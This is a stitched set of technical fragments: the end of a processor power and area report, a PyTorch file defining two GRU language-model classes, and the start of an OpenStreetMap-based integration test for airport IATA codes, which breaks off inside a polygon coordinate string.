'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0177902,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.055008,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.49898,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.204523,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.186832,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.88731,
'Instruction Fetch Unit/Runtime Dynamic': 0.470895,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0413557,
'L2/Runtime Dynamic': 0.0090745,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.93601,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.829551,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0549632,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0549632,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.19556,
'Load Store Unit/Runtime Dynamic': 1.15557,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.13553,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.27106,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0481,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0486382,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.217554,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0337738,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.45629,
'Memory Management Unit/Runtime Dynamic': 0.082412,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.4565,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0172167,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00853193,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0942385,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.119987,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.48195,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 3.5995855135814714,
'Runtime Dynamic': 3.5995855135814714,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.241052,
'Runtime Dynamic': 0.0794812,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 76.8249,
'Peak Power': 109.937,
'Runtime Dynamic': 16.6309,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 76.5838,
'Total Cores/Runtime Dynamic': 16.5514,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.241052,
'Total L3s/Runtime Dynamic': 0.0794812,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
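The power report above encodes its hierarchy in slash-separated key paths ('Unit/Sub-unit/Metric'). A minimal illustrative sketch, not part of the original data, of how such a breakdown can be filtered by key prefix (the few values are copied from entries above):

# Hypothetical snippet: a handful of per-core entries copied from the report above.
core = {
    'Execution Unit/Runtime Dynamic': 1.64401,
    'Load Store Unit/Runtime Dynamic': 1.15557,
    'Load Store Unit/Data Cache/Runtime Dynamic': 0.829551,
    'Runtime Dynamic': 3.48195,
}

# Select every metric reported under one functional unit by matching the key prefix.
lsu_metrics = {k: v for k, v in core.items() if k.startswith('Load Store Unit/')}
print(lsu_metrics)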
| 75.073304
| 124
| 0.68212
| 8,082
| 68,617
| 5.785325
| 0.067434
| 0.123532
| 0.112924
| 0.093419
| 0.939175
| 0.931304
| 0.917916
| 0.88714
| 0.862908
| 0.842355
| 0
| 0.132078
| 0.224303
| 68,617
| 914
| 125
| 75.073304
| 0.746383
| 0
| 0
| 0.642232
| 0
| 0
| 0.657335
| 0.048092
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b30da312fb88667e9bbf1949fc2e027655f94913
| 4,951
|
py
|
Python
|
RNN.py
|
chunkitmax/7ca0a1e5281409b27ab971d31707fe90
|
3aa47240aa5383c6036eb3a5cb63b33838287c83
|
[
"MIT"
] | null | null | null |
RNN.py
|
chunkitmax/7ca0a1e5281409b27ab971d31707fe90
|
3aa47240aa5383c6036eb3a5cb63b33838287c83
|
[
"MIT"
] | null | null | null |
RNN.py
|
chunkitmax/7ca0a1e5281409b27ab971d31707fe90
|
3aa47240aa5383c6036eb3a5cb63b33838287c83
|
[
"MIT"
] | null | null | null |
'''
RNN.py
define RNN models
'''
import torch as T
from dataloader import DataManager
class RNN_M2M(T.nn.Module):
    # Many-to-many GRU: produces an output token prediction at every time step.
    def __init__(self, word_list_len, embedding_len, hidden_size=50, lr=0.01,
                 num_layers=3, drop_rate=0., use_cuda=False, use_adam=True,
                 use_rmsprop=False, pretrained_emb=None):
        super(RNN_M2M, self).__init__()
        self.word_list_len = word_list_len
        self.embedding_len = embedding_len
        self.hidden_size = hidden_size
        self.lr = lr
        self.num_layers = num_layers
        self.drop_rate = drop_rate
        self.use_cuda = use_cuda
        self.use_adam = use_adam
        self.use_rmsprop = use_rmsprop
        self.pretrained_emb = pretrained_emb
        self._build_model()

    def _build_model(self):
        if self.pretrained_emb is not None:
            self.Embedding = T.nn.Embedding(*self.pretrained_emb.shape, padding_idx=0)
            self.Embedding.weight = T.nn.Parameter(self.pretrained_emb)
            self.Embedding.weight.requires_grad = False
        else:
            self.Embedding = T.nn.Embedding(self.word_list_len, self.embedding_len, padding_idx=0,
                                            scale_grad_by_freq=True)
        self.RNN = T.nn.GRU(input_size=self.embedding_len, hidden_size=self.hidden_size,
                            num_layers=self.num_layers, batch_first=True, dropout=self.drop_rate)
        self.Fc = T.nn.Linear(self.hidden_size, self.word_list_len)
        self.Loss = T.nn.CrossEntropyLoss()
        if self.use_cuda:
            self.cuda()
        if self.use_adam:
            self.optimizer = T.optim.Adam(filter(lambda p: p.requires_grad, self.parameters()),
                                          lr=self.lr)
        elif self.use_rmsprop:
            self.optimizer = T.optim.RMSprop(filter(lambda p: p.requires_grad, self.parameters()),
                                             lr=self.lr)
        else:
            self.optimizer = T.optim.SGD(filter(lambda p: p.requires_grad, self.parameters()),
                                         lr=self.lr, momentum=0.9, nesterov=True)

    def forward(self, inputs, hidden_state=None, return_states=False):
        embeddings = self.Embedding(inputs)
        if hidden_state is not None:
            output, state = self.RNN(embeddings, hidden_state)
        else:
            output, state = self.RNN(embeddings)
        output = self.Fc(output)
        _, max_indice = T.max(output, dim=2)
        if return_states:
            return output, max_indice, state
        return output, max_indice

    def get_loss(self):
        return self.Loss

    def get_optimizer(self):
        return self.optimizer


class RNN_M2O(T.nn.Module):
    # Many-to-one GRU: only the last time step's hidden output is projected to the vocabulary.
    def __init__(self, word_list_len, embedding_len, hidden_size=50, lr=0.01,
                 num_layers=3, drop_rate=0., use_cuda=False, use_adam=True,
                 use_rmsprop=False, pretrained_emb=None):
        super(RNN_M2O, self).__init__()
        self.word_list_len = word_list_len
        self.embedding_len = embedding_len
        self.hidden_size = hidden_size
        self.lr = lr
        self.num_layers = num_layers
        self.drop_rate = drop_rate
        self.use_cuda = use_cuda
        self.use_adam = use_adam
        self.use_rmsprop = use_rmsprop
        self.pretrained_emb = pretrained_emb
        self._build_model()

    def _build_model(self):
        if self.pretrained_emb is not None:
            self.Embedding = T.nn.Embedding(*self.pretrained_emb.shape, padding_idx=0)
            self.Embedding.weight = T.nn.Parameter(self.pretrained_emb)
            self.Embedding.weight.requires_grad = False
        else:
            self.Embedding = T.nn.Embedding(self.word_list_len, self.embedding_len, padding_idx=0,
                                            scale_grad_by_freq=True)
        self.RNN = T.nn.GRU(input_size=self.embedding_len, hidden_size=self.hidden_size,
                            num_layers=self.num_layers, batch_first=True, dropout=self.drop_rate)
        self.Fc = T.nn.Linear(self.hidden_size, self.word_list_len)
        self.Loss = T.nn.CrossEntropyLoss()
        if self.use_cuda:
            self.cuda()
        if self.use_adam:
            self.optimizer = T.optim.Adam(filter(lambda p: p.requires_grad, self.parameters()),
                                          lr=self.lr)
        elif self.use_rmsprop:
            self.optimizer = T.optim.RMSprop(filter(lambda p: p.requires_grad, self.parameters()),
                                             lr=self.lr)
        else:
            self.optimizer = T.optim.SGD(filter(lambda p: p.requires_grad, self.parameters()),
                                         lr=self.lr, momentum=0.9, nesterov=True)

    def forward(self, inputs, hidden_state=None, return_states=False):
        embeddings = self.Embedding(inputs)
        if hidden_state is not None:
            output, state = self.RNN(embeddings, hidden_state)
        else:
            output, state = self.RNN(embeddings)
        output = output.narrow(1, inputs.size(1)-1, 1).view(-1, self.hidden_size)
        output = self.Fc(output)
        _, max_indice = T.max(output, dim=1)
        if return_states:
            return output, max_indice, state
        return output, max_indice

    def get_loss(self):
        return self.Loss

    def get_optimizer(self):
        return self.optimizer
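A minimal usage sketch for the module above (illustrative only: the vocabulary size, dimensions, and dummy batch are invented, and RNN_M2M is assumed to be in scope, e.g. imported from RNN.py with its dataloader dependency available):

import torch as T

# Hypothetical sizes: 100-word vocabulary, 16-dim embeddings, 32-dim hidden state.
model = RNN_M2M(word_list_len=100, embedding_len=16, hidden_size=32, num_layers=1)
dummy_batch = T.randint(1, 100, (2, 7))     # (batch, sequence) of token ids; index 0 is padding
logits, predicted_ids = model(dummy_batch)  # logits: (2, 7, 100); predicted_ids: (2, 7)
# Targets are just the inputs here, purely to show the expected shapes.
loss = model.get_loss()(logits.view(-1, 100), dummy_batch.view(-1))
loss.backward()
model.get_optimizer().step()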
| 39.608
| 93
| 0.661886
| 701
| 4,951
| 4.433666
| 0.135521
| 0.066924
| 0.035393
| 0.03861
| 0.954955
| 0.954955
| 0.954955
| 0.954955
| 0.954955
| 0.954955
| 0
| 0.008698
| 0.23369
| 4,951
| 124
| 94
| 39.927419
| 0.81049
| 0.004848
| 0
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09009
| false
| 0
| 0.018018
| 0.036036
| 0.198198
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b353306056576c6c6a208d3d5554fbbf3172ada5
| 15,714
|
py
|
Python
|
integration-test/398-airport-iata-codes.py
|
roman-ianivskyy/vector-datasource
|
3d59c0d9856d6bc2a78c4a9273b4e850c2e41d92
|
[
"MIT"
] | null | null | null |
integration-test/398-airport-iata-codes.py
|
roman-ianivskyy/vector-datasource
|
3d59c0d9856d6bc2a78c4a9273b4e850c2e41d92
|
[
"MIT"
] | null | null | null |
integration-test/398-airport-iata-codes.py
|
roman-ianivskyy/vector-datasource
|
3d59c0d9856d6bc2a78c4a9273b4e850c2e41d92
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
import dsl
from shapely.wkt import loads as wkt_loads
from . import FixtureTest
class AirportIataCodes(FixtureTest):
def test_sfo(self):
# San Francisco International
self.generate_fixtures(dsl.way(23718192, wkt_loads('POLYGON ((-122.402782773269 37.63531941394439, -122.40266823807 37.63591797330289, -122.402642995411 37.63627586880459, -122.400825793423 37.63777992163308, -122.400541476635 37.6380545077576, -122.400242517309 37.63819677996181, -122.399856241737 37.6383059736938, -122.399504910629 37.6383616019698, -122.398018917486 37.63836757738308, -122.397126531083 37.63836700829618, -122.396226059842 37.6386334827911, -122.395922968265 37.63869978115548, -122.395041092151 37.6386999945622, -122.394648708034 37.63862437743169, -122.394254167962 37.63858532396358, -122.392438313446 37.63858546623489, -122.391235918439 37.6385816960447, -122.390817393348 37.63864899035377, -122.389157396534 37.63901967704601, -122.388567922045 37.6391058929143, -122.388302919036 37.63913456037959, -122.388062529866 37.6390834141992, -122.387878285401 37.63897038030411, -122.387772913018 37.63880221628041, -122.387668528782 37.63847058205218, -122.387559113981 37.63819279634378, -122.386109861933 37.6361934199638, -122.385986523244 37.63597168263642, -122.385954633052 37.63578217032489, -122.385994338587 37.63559571648658, -122.386109592438 37.63542768710219, -122.386339022162 37.63525887481049, -122.386630794966 37.63517770534189, -122.387070430466 37.6351242088515, -122.387272910731 37.63505619995949, -122.38816152421 37.63456149742279, -122.388740129085 37.63412156936317, -122.389776874754 37.63391569010429, -122.391048170544 37.6335037164537, -122.391386206586 37.6332148142114, -122.391498765491 37.6329047108011, -122.391448819161 37.63268018914851, -122.3909392049 37.63174545752518, -122.392199810738 37.63131220020119, -122.391559311941 37.62998359980139, -122.391427439257 37.6298805122232, -122.388171226015 37.62852100917631, -122.387996773187 37.62878630951541, -122.385765178358 37.62809285554551, -122.379756976244 37.63013221925351, -122.37423197792 37.62792552065459, -122.372338688627 37.62743632006278, -122.371877763055 37.62812010434631, -122.368255665998 37.62669262369908, -122.36714849241 37.62843961891189, -122.365768141145 37.62789087260929, -122.365253136992 37.62676932017637, -122.368741924061 37.62124049667588, -122.367821330558 37.62020429901018, -122.367308033205 37.62043946015379, -122.366929483144 37.62051801305999, -122.366536470207 37.6205380781912, -122.366328240724 37.62050271517259, -122.365617314008 37.62026477925429, -122.365174444573 37.61998422165949, -122.365064221288 37.61986567988729, -122.364742714248 37.61903317832368, -122.364662584524 37.6189115042374, -122.364569519061 37.61884938633769, -122.355255426869 37.61492880935528, -122.355170895401 37.61486868056239, -122.355135142453 37.61479915880869, -122.355136310262 37.6147250116876, -122.355179609059 37.6146547070554, -122.358802963758 37.60916860603569, -122.366974758234 37.6124694664738, -122.367632684348 37.61287835449848, -122.368775431221 37.61338750447399, -122.371457171839 37.61520340875107, -122.378584674798 37.60572142198278, -122.378192021187 37.6052981187722, -122.378828297903 37.60493409601148, -122.381680808256 37.60455576665628, -122.381876820651 37.6044554905509, -122.382042290326 37.60436631658349, -122.382557923299 37.60463568853699, -122.383020825165 37.60492406134129, -122.383427672157 37.60520289656819, -122.384410159584 37.60584226364769, -122.384490109644 37.60594787540128, -122.385525687504 37.60664039727529, -122.385564943881 37.6070947211435, -122.385595486601 37.60767436434308, -122.386246405856 37.6079477807216, -122.386327703389 37.6078152002346, 
-122.386698707602 37.60797396943178, -122.386608516747 37.60810868458069, -122.386847468613 37.60820916925559, -122.386492364581 37.608780264068, -122.385977719755 37.6085681233169, -122.385745145927 37.60891967458439, -122.385749727335 37.60929072304688, -122.385947895687 37.60937825434759, -122.385847913196 37.6095336043617, -122.386355281668 37.60975648801139, -122.386575818071 37.60953737602549, -122.386752606519 37.60946372180269, -122.386992366868 37.60946770696059, -122.387235361152 37.6095741675278, -122.387984825594 37.60966746272569, -122.388313608988 37.60994386062659, -122.389838229688 37.6095805722362, -122.391743107248 37.6107278601031, -122.392167740883 37.61101065864849, -122.392897172894 37.6129271704265, -122.393137831558 37.6133756207896, -122.393493025421 37.61333456157809, -122.393827737696 37.61327258133899, -122.394060760681 37.61321415904558, -122.394076032041 37.61315096898599, -122.394739078552 37.61303611664558, -122.394902661765 37.61344201284619, -122.39614071989 37.61453935892668, -122.39703409444 37.61493919846718, -122.397241874765 37.6151045701634, -122.397419561528 37.61531825774418, -122.39777170112 37.61584418416938, -122.398200017847 37.61692939821548, -122.398558984635 37.61787840495269, -122.399218258222 37.61967776304128, -122.399837826273 37.6214926598776, -122.400493416768 37.62341132060519, -122.401401433857 37.62610950021288, -122.401612807443 37.62729530789251, -122.401933865326 37.62929079730368, -122.40191239559 37.6295417237437, -122.401836038791 37.629813423405, -122.401691859188 37.63007658481649, -122.400390469836 37.6320202082337, -122.400645860871 37.63246797430131, -122.401998813521 37.6331083874929, -122.402180632534 37.6332533013763, -122.4022967847 37.63343378528259, -122.402344844568 37.63359136153137, -122.402782773269 37.63531941394439))'), {
u'gnis:county_name': u'San Mateo', u'internet_access:ssid': u'#SFO FREE WIFI', u'wikidata': u'Q8688', u'owner': u'San Francisco Airport Commission', u'name:de': u'Internationaler Flughafen San Francisco', u'is_in': u'San Mateo County', u'addr:housenumber': u'780', u'gnis:feature_type': u'Airport', u'way_area': u'1.24398e+07', u'wikipedia': u'en:San Francisco International Airport', u'addr:state': u'CA', u'ele': u'4', u'source': u'openstreetmap.org', u'gnis:feature_id': u'1653945', u'addr:street': u'S Airport Blvd', u'ref': u'KSFO', u'website': u'http://www.flysfo.com/', u'city_served': u'San Francisco, California', u'name:ja': u'\u30b5\u30f3\u30d5\u30e9\u30f3\u30b7\u30b9\u30b3\u56fd\u969b\u7a7a\u6e2f', u'short_name': u'San Francisco Airport', u'passengers': u'47155100', u'iata': u'SFO', u'aerodrome:type': u'public', u'icao': u'KSFO', u'gnis:created': u'03/01/1994', u'aerodrome': u'international', u'name:el': u'\u0394\u03b9\u03b5\u03b8\u03bd\u03ae\u03c2 \u0391\u03b5\u03c1\u03bf\u03bb\u03b9\u03bc\u03ad\u03bd\u03b1\u03c2 \u03a3\u03b1\u03bd \u03a6\u03c1\u03b1\u03bd\u03c3\u03af\u03c3\u03ba\u03bf', u'name:en': u'San Francisco International Airport', u'name': u'San Francisco International Airport', u'addr:postcode': u'94128', u'addr:city': u'San Francisco', u'internet_access:fee': u'no', u'aeroway': u'aerodrome', u'internet_access': u'wlan', u'is_in:iso_3166_2': u'US-CA', u'source_ref': u'geonames.usgs.gov'}))
self.assert_has_feature(
13, 1311, 3170, 'pois',
{'kind': 'aerodrome', 'iata': 'SFO'})
def test_oak(self):
# Oakland airport
self.generate_fixtures(dsl.way(54363486, wkt_loads('POLYGON ((-122.251293129543 37.72490617803489, -122.251293129543 37.72528631025018, -122.250709404272 37.72582261309319, -122.250271745065 37.7262367743562, -122.250091363356 37.72640651656879, -122.249069978878 37.72646079988989, -122.248855101862 37.72649689401339, -122.248675438806 37.72635479106338, -122.248666635316 37.72625027416969, -122.248469185616 37.7260669607028, -122.248469185616 37.72593807259049, -122.248623695845 37.72582261309319, -122.248752514257 37.72576825825217, -122.249044287061 37.72558501464461, -122.248331923041 37.72504871008109, -122.2479457373 37.7249128570103, -122.247782603245 37.72500117574517, -122.247542303906 37.7250079968177, -122.247327696385 37.72510981546048, -122.247233283448 37.72502838897859, -122.246898481342 37.72512338653218, -122.246718279296 37.72511656547029, -122.245619639704 37.72529988128949, -122.245447971653 37.72529988128949, -122.244804328752 37.72495371243168, -122.24467551034 37.72485182252129, -122.244512376284 37.7248246802761, -122.244323640243 37.72472968233939, -122.244109032722 37.72456668634359, -122.243937364671 37.72443765351368, -122.243646220687 37.72425156447159, -122.239630212378 37.7209887130929, -122.236737188006 37.71960011022599, -122.236621934155 37.71958952257982, -122.236554830003 37.71960011022599, -122.236205385357 37.71989478726049, -122.234797186318 37.72126107288809, -122.233032266279 37.72297109718351, -122.232549601477 37.7234314597321, -122.232078614774 37.72388876410138, -122.231358615074 37.72458778915839, -122.228689900027 37.72721628601359, -122.228556500208 37.72728861560778, -122.228344587632 37.72728229209988, -122.228231759233 37.7272540849852, -122.226920398581 37.7269259011653, -122.226794275115 37.72716768730739, -122.226740645692 37.7271634953123, -122.226721870903 37.72736499501418, -122.226727170963 37.72824956937759, -122.227655579809 37.72842811712219, -122.229165378307 37.72871849608017, -122.229052729571 37.72902819922441, -122.227660610375 37.73160566920351, -122.226756725536 37.73164808395509, -122.226756725536 37.73330060628359, -122.22662530201 37.7335700079751, -122.226531428063 37.73386271123349, -122.226469713803 37.7341723928629, -122.226453633959 37.7345414657444, -122.226445189796 37.73578500402448, -122.22645956284 37.73899030097969, -122.226462706944 37.7396773910561, -122.226480493586 37.74363052145789, -122.223849238287 37.74366227408098, -122.223878703029 37.7449985001975, -122.224981115545 37.74510881537909, -122.224986505437 37.7452614663153, -122.22449297102 37.7453335651822, -122.224001862054 37.74538996562618, -122.223736859045 37.74540999700779, -122.223386875411 37.74543301177997, -122.222657892558 37.74542995735078, -122.222356867106 37.74542399055839, -122.222115938947 37.74539699792041, -122.22201092589 37.7453789554674, -122.221959901582 37.74536496190831, -122.221738916022 37.74532497014858, -122.221533920474 37.74528497836727, -122.221283919331 37.74521600492469, -122.220993943157 37.74511300635818, -122.220868897669 37.74506498766729, -122.22042692655 37.74486396233569, -122.220167942253 37.74472700907621, -122.219941926128 37.74458302319249, -122.219780858197 37.74445601419819, -122.219598859521 37.7443109622726, -122.219506872036 37.74422898862967, -122.219180873419 37.74388901724902, -122.219129938942 37.7438140045485, -122.219053941469 37.743729970344, -122.218955935272 37.74360999234979, -122.218702879856 37.7433220159562, -122.218492943574 37.74306799342191, -122.218350919928 37.74288301673258, 
-122.218234857593 37.74274698327319, -122.218044863911 37.74250901291288, -122.217887928231 37.74232801285489, -122.217629932081 37.7420009613922, -122.217460869144 37.741798009747, -122.216767908734 37.74091295789887, -122.215603781958 37.73950455355099, -122.214659562762 37.73837829385128, -122.214093713965 37.73765929445129, -122.213559935023 37.73698049748229, -122.213345417333 37.73667501905528, -122.213176444228 37.73639930593229, -122.212881257826 37.73591351978678, -122.212755314023 37.73567595371398, -122.212487077079 37.73509901451231, -122.212256389714 37.73459631145159, -122.211846039293 37.73373291311091, -122.211615262096 37.73327900863718, -122.211462368835 37.73295646408938, -122.211014468834 37.73200615727129, -122.210864270519 37.73174527545498, -122.210687302408 37.73149071586859, -122.210440535199 37.73123395295428, -122.209893371359 37.7307884877894, -122.209311263055 37.73039609257019, -122.208659535317 37.73001421038119, -122.207375124124 37.72930607125718, -122.205283037658 37.72815628102949, -122.20212869337 37.72638278536621, -122.201608389157 37.72624281374678, -122.200337003535 37.72580151063029, -122.199832689335 37.72561059346148, -122.19938748428 37.72538990482221, -122.199671531573 37.72489580430601, -122.199730281393 37.724835054015, -122.199822179046 37.72476115885698, -122.199902668096 37.72467397668627, -122.199995464064 37.72452959653339, -122.200099938132 37.7243327786471, -122.200176025437 37.72413617339889, -122.200230373511 37.7239380044439, -122.20026558747 37.7236803626934, -122.200231631153 37.72315278405669, -122.200230014185 37.72269810418028, -122.200249597458 37.72236002347581, -122.200313557507 37.72196459925629, -122.200420636688 37.72159105821197, -122.200535261719 37.72123890327881, -122.20072579439 37.72080268644267, -122.200918842345 37.7204400112942, -122.201175940179 37.72006447294958, -122.201490260697 37.7196851666305, -122.201784099627 37.7193575177389, -122.202200917919 37.71896406713338, -122.202626809195 37.71857871516488, -122.202868905164 37.7183700856397, -122.202909419183 37.71816571909098, -122.203313481398 37.71785959456909, -122.20244256473 37.71708177109411, -122.202021973514 37.71674920749609, -122.201678727244 37.71650106291599, -122.201399710517 37.71624225831889, -122.201104703777 37.7159580127994, -122.200854702634 37.7156763954754, -122.200552060215 37.71538930530248, -122.200210969901 37.71511280230468, -122.199884791621 37.71485477454648, -122.199507229708 37.7144473716878, -122.200841766894 37.71374277903888, -122.200927645835 37.7136578579394, -122.200970585305 37.7135475669603, -122.200976604018 37.7134330119809, -122.200948217255 37.71330658912748, -122.202133723935 37.71302645407658, -122.204107771772 37.71257242269488, -122.20510562039 37.712349563262, -122.205883471594 37.71216500728681, -122.206845746927 37.71190796417878, -122.206905844219 37.71185367019291, -122.207086046265 37.71180619845529, -122.207163211548 37.71183327440519, -122.20728089085 37.7118383200536, -122.208766794162 37.71149450452489, -122.209276408422 37.7113692864847, -122.209703826835 37.7112697230678, -122.209849803068 37.71120860627168, -122.210004223466 37.71108637252841, -122.210313243923 37.71080800574517, -122.210699519495 37.71041415440249, -122.211128644707 37.70999315328689, -122.211440988931 37.7097396560193, -122.211824479726 37.7093514133591, -122.211969377981 37.70919222119888, -122.211996237608 37.70905221709679, -122.211170146873 37.70203241348079, -122.211172841819 37.7019283597972, -122.211215691458 37.7018370994791, 
